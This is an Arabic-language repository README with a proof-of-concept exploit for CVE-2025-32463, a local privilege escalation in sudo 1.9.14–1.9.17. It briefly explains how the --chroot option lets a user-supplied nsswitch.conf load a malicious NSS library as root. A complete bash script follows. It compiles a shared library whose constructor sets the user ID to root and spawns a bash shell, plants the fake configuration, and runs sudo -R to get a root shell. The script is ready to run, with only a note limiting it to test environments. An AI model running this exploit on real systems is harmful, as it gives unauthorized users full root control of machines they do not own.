
استغلال إثبات المفهوم لـ CVE-2025-32463، وهو تصعيد امتيازات محلي في sudo 1.9.14-1.9.17 عبر سوء تكوين chroot وحقن مكتبة NSS خبيثة.
--chrootExploitDB ID: 52352
يوثّق هذا المستودع ثغرة حرجة من نوع تصعيد الصلاحيات المحلية (LPE) تؤثر على إصدارات Sudo 1.9.14 – 1.9.17.
تنبع الثغرة من التنفيذ الخاطئ لخيار sudo -R (--chroot)، ما يسمح للمهاجم بـتنفيذ أوامر بصلاحيات root حتى لو لم يكن مسموحًا له في ملف sudoers.
🔥 النتيجة: مستخدم غير مصرح له ← root shell
معامل --chroot (-R) في Sudo يمنح المستخدم صلاحية تنفيذ الأوامر داخل دليل root يحدده بنفسه.
لكن نتيجةً لتغيير أُدخل في sudo 1.9.14:
chroot() عبر الدليل الذي يحدده المستخدميؤدي هذا إلى جعل المهاجم يحمّل مكتبة NSS خبيثة (libnss_*.so) بصلاحيات root عبر ملف:
/etc/nsswitch.conf
مزوّر ينشئه بنفسه.
nsswitch.conf مزوّرsudo -R <dir> <command>⚠️ استخدمه في البيئات التعليمية وبيئات الاختبار فقط
#!/bin/bash
# sudo-chwoot.sh – PoC for CVE-2025-32463
set -e
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd "$STAGE"
cat > woot1337.c <<'EOF'
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor))
void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash","/bin/bash",NULL);
}
EOF
mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
sudo -R woot woot